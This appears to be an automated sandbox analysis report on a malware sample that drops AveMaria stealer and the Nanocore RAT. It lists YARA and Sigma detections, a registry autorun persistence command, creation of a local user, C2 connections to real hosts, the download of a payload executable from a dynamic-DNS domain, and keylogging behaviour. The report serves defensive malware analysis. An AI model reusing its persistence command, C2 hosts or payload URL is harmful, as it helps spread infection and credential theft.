40.2.KetqqsbuJ.exe.6c80000.35.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c80000.35.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.5280000.21.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.5280000.21.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14e21:$x1: NanoCore.ClientPluginHost 0x21fcf:$x1: NanoCore.ClientPluginHost 0x2be63:$x1: NanoCore.ClientPluginHost 0x33dcd:$x1: NanoCore.ClientPluginHost 0x3dad0:$x1: NanoCore.ClientPluginHost 0x4757f:$x1: NanoCore.ClientPluginHost 0x519ef:$x1: NanoCore.ClientPluginHost 0x5ca15:$x1: NanoCore.ClientPluginHost 0x687ff:$x1: NanoCore.ClientPluginHost 0x745be:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e4e:$x2: IClientNetworkHost 0x22008:$x2: IClientNetworkHost 0x2be9c:$x2: IClientNetworkHost 0x33e06:$x2: IClientNetworkHost 0x476dc:$x2: IClientNetworkHost 0x51a28:$x2: IClientNetworkHost 0x5ca2f:$x2: IClientNetworkHost 0x68819:$x2: IClientNetworkHost 0x745fb:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x14e21:$x2: NanoCore.ClientPluginHost 0x21fcf:$x2: NanoCore.ClientPluginHost 0x2be63:$x2: NanoCore.ClientPluginHost 0x33dcd:$x2: NanoCore.ClientPluginHost 0x3dad0:$x2: NanoCore.ClientPluginHost 0x4757f:$x2: NanoCore.ClientPluginHost 0x519ef:$x2: NanoCore.ClientPluginHost 0x5ca15:$x2: NanoCore.ClientPluginHost 0x687ff:$x2: NanoCore.ClientPluginHost 0x745be:$x2: NanoCore.ClientPluginHost 0x15df0:$s2: FileCommand 0x484d5:$s3: PipeExists 0x6a6b:$s4: PipeCreated 0x1a7f2:$s4: PipeCreated 0x220ec:$s4: PipeCreated 0x2bf67:$s4: PipeCreated 0x33ee8:$s4: PipeCreated 0x3dbae:$s4: PipeCreated 0x47775:$s4: PipeCreated 0x51b3a:$s4: PipeCreated
40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14dfb:$a: NanoCore 0x14e21:$a: NanoCore 0x14e7d:$a: NanoCore 0x21d17:$a: NanoCore 0x21d70:$a: NanoCore 0x21da3:$a: NanoCore 0x21fcf:$a: NanoCore 0x2204b:$a: NanoCore 0x22664:$a: NanoCore 0x227ad:$a: NanoCore 0x22c81:$a: NanoCore 0x22f68:$a: NanoCore 0x22f7f:$a: NanoCore 0x2be63:$a: NanoCore 0x2bedf:$a: NanoCore 0x2e7c2:$a: NanoCore 0x33dcd:$a: NanoCore 0x33e47:$a: NanoCore
40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x34e2:$a: NanoCore 0x350b:$a: NanoCore 0x283d0:$a: NanoCore 0x283e8:$a: NanoCore 0x28411:$a: NanoCore 0x37816:$a: NanoCore 0x3782e:$a: NanoCore 0x37853:$a: NanoCore 0x40a72:$a: NanoCore 0x40acb:$a: NanoCore 0x40b08:$a: NanoCore 0x40b81:$a: NanoCore 0x5422c:$a: NanoCore 0x54241:$a: NanoCore 0x54276:$a: NanoCore 0x61e8b:$a: NanoCore 0x61eb0:$a: NanoCore 0x61f09:$a: NanoCore 0x720a6:$a: NanoCore 0x720cc:$a: NanoCore 0x72128:$a: NanoCore
40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1f19a:$a: NanoCore 0x1f1b2:$a: NanoCore 0x1f1db:$a: NanoCore 0x2e5e0:$a: NanoCore 0x2e5f8:$a: NanoCore 0x2e61d:$a: NanoCore 0x3783c:$a: NanoCore 0x37895:$a: NanoCore 0x378d2:$a: NanoCore 0x3794b:$a: NanoCore 0x4aff6:$a: NanoCore 0x4b00b:$a: NanoCore 0x4b040:$a: NanoCore 0x58c55:$a: NanoCore 0x58c7a:$a: NanoCore 0x58cd3:$a: NanoCore 0x68e70:$a: NanoCore 0x68e96:$a: NanoCore 0x68ef2:$a: NanoCore 0x75d47:$a: NanoCore 0x75da0:$a: NanoCore
Click to see the 129 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe, ProcessId: 5916, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Direct Autorun Keys Modification

Show sources

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5376, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ProcessId: 4600

Sigma detected: Group Modification Logging

Show sources

Source: Event Logs

Author: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x190be, data 9: -

Sigma detected: Local User Creation

Show sources

Source: Event Logs

Author: Patrick Bareiss: Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: jjIFKkt, data 1: computer, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-3853321935-2125563209-4053062332-1003, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-3853321935-2125563209-4053062332-1002, data 4: user, data 5: computer, data 6: 0x190be, data 7: -, data 8: jjIFKkt, data 9: %%1793

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://hutyrtit.ydns.eu/microC.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://hutyrtit.ydns.eu/

Virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	ReversingLabs: Detection: 19%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll	Metadefender: Detection: 20%	Perma Link
Source: C:\Program Files\Microsoft DN1\sqlmap.dll	ReversingLabs: Detection: 42%
Source: C:\ProgramData\images.exe	ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe	ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	ReversingLabs: Detection: 19%

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR

Machine Learning detection for dropped file

Show sources

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\images.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Xjf4yH9N2t.exe

Joe Sandbox ML: detected

Source: 40.2.KetqqsbuJ.exe.5260000.20.unpack	Avira: Label: TR/NanoCore.fadte
Source: 22.2.images.exe.400000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack	Avira: Label: TR/NanoCore.fadte
Source: 40.2.KetqqsbuJ.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\ProgramData\images.exe

Unpacked PE file: 22.2.images.exe.4240000.5.unpack

Source: Xjf4yH9N2t.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Directory created: C:\Program Files\Microsoft DN1	Jump to behavior
Source: C:\ProgramData\images.exe	Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll	Jump to behavior
Source: C:\ProgramData\images.exe	Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini	Jump to behavior

Source: Xjf4yH9N2t.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Xjf4yH9N2t.exe, 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, images.exe, 00000016.00000003.295362829.0000000000E39000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Xjf4yH9N2t.exe, 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, images.exe, 00000016.00000003.295362829.0000000000E39000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: KetqqsbuJ.exe, 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp
Source:	Binary string: RfxVmt.pdb source: images.exe, 00000016.00000003.313698047.00000000049CB000.00000004.00000001.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: images.exe, 00000016.00000003.313698047.00000000049CB000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: KetqqsbuJ.exe, 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: KetqqsbuJ.exe, 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: KetqqsbuJ.exe, 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdbUGP source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: KetqqsbuJ.exe, 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: KetqqsbuJ.exe, 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe

Code function: 4x nop then lea esp, dword ptr [ebp-08h]

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49738 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49739 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49740 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49741 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49744 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49745 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49746 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49747 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49748 -> 203.159.80.186:8234

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 203.159.80.186 ports 8234,0,3,6,7,6703

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: hhjhtggfr.duckdns.org

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0040290E URLDownloadToFileW,ShellExecuteW,

Source: global traffic

TCP traffic: 192.168.2.3:49727 -> 203.159.80.186:6703

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 02 Aug 2021 07:13:53 GMTAccept-Ranges: bytesETag: "382415f36d87d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:17:47 GMTContent-Length: 1378816Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hutyrtit.ydns.euConnection: Keep-Alive

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0040290E URLDownloadToFileW,ShellExecuteW,

Source: global traffic

Source: unknown

DNS traffic detected: queries for: sdafsdffssffs.ydns.eu

Source: KetqqsbuJ.exe, 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	String found in binary or memory: http://hutyrtit.ydns.eu/
Source: images.exe, 00000016.00000002.474849931.0000000000E2B000.00000004.00000020.sdmp	String found in binary or memory: http://hutyrtit.ydns.eu/microC.exe
Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	String found in binary or memory: http://hutyrtit.ydns.eu/microC.exe=S;X
Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	String found in binary or memory: http://hutyrtit.ydns.eu/microC.exeASwX
Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	String found in binary or memory: http://hutyrtit.ydns.eu/qB
Source: images.exe, 00000016.00000003.313221869.0000000000EB7000.00000004.00000001.sdmp	String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: Xjf4yH9N2t.exe	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: Xjf4yH9N2t.exe, 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: images.exe, 00000016.00000002.482254171.0000000004A17000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chro
Source: images.exe, 00000016.00000002.482254171.0000000004A17000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482229544.00000000049CB000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482220451.00000000049A0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: images.exe, 00000016.00000002.482229544.00000000049CB000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482220451.00000000049A0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\ProgramData\images.exe

Windows user hook set: 0 keyboard low level C:\ProgramData\images.exe

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00408793 DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
